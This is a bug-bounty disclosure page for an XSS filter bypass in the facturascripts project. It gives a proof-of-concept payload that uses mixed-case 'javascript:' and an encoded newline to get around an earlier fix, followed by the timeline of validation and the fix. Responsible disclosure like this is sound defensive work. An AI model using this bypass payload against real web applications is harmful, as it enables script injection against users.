xss bypass in neorazorx/facturascripts

Valid

Reported on

May 18th 2022

Description

xss check bypassed

Proof of Concept

The fix for this bug https://huntr.dev/bounties/2adf903d-cab1-4ca8-8236-b6315f0fdaba/ can be bypassed using bellow payload

jAvAsCriPt://sadas.com/%0aalert(11);//

Impact

xss check bypass

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago
ranjit-git modified the report
a year ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago
Carlos Garcia validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.08 with commit 0ff056 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation